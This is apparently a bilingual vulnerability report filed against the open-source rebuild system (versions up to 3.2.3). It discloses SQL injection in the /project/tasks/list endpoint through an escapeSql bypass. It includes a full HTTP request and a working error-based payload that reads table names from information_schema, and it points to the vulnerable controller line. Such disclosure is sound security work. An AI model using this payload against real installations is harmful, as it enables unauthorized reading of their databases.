SQL injection vulnerability exists in the /project/tasks/list interface of the rebuild system

[Mechoy]

版本 / Version

<=3.2.3

什么问题 / What's the problem

SQL injection vulnerability exists in the/project/tasks/list interface of the rebuild system.
在rebuild系统的/project/tasks/list接口中存在SQL注入漏洞。

如何复现此问题 / How to reproduce this problem

功能点 / Function points

请求信息 / Request message:

POST /project/tasks/list?plan=051-0186e077f3840002&sort=&search=1&pageNo=1&pageSize=40&project=050-0186e077f3840001 HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 0
X-AuthToken: 
Accept: */*
X-CsrfToken: 
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/project/050-0186e077f3840001/tasks
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679235290.8.1.1679235510.0.0.0
Connection: close

攻击载荷 / payload:%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+

漏洞复现 / Vulnerability recurrence

There you can see it!

系统环境 (操作系统/MySQL版本/浏览器等) / System environment (OS/MySQL/Browser etc)

Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome

说明 / Suggested description

sql injection vulnerability exists in rebuild <=3.2.3
在rebuild系统小于3.2.3版本中存在SQL注入漏洞
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
未能合法检查参数从而导致sql注入漏洞.

漏洞类型 / Vulnerability Type

SQLi

产品供应商 / Vendor of Product

https://github.com/getrebuild/rebuild

受影响的产品代码库 / Affected Product Code Base

<=3.2.3

受影响组件 / Affected Component

/project/tasks/list

攻击方式 / Attack Type

Remote

漏洞成因 / Cause of vulnerability

In the com.build.web.project.ProjectTaskController#taskList() method, some SQL statements were customized and eventually spliced into the query statement.
在com.rebuild.web.project.ProjectTaskController#taskList()方法中，自定义了部分SQL语句，并且最终将该部分SQL语句拼接至查询语句中。

Although the 'StringsEscapeUtils. EscapeSql()' method is used here to process user input, there is a bypass.
虽然此处使用了StringsEscapeUtils.escapeSql()方法对用户输入做了处理，但存在绕过。

Finally, in line 122 of com.rebuild.web.project.ProjectTaskController, user input was brought into the query statement, causing a SQL injection vulnerability.
最终在com.rebuild.web.project.ProjectTaskController的第122行，将用户输入带入到查询语句中，造成SQL注入漏洞。

The end,thanks!

[getrebuild]

#594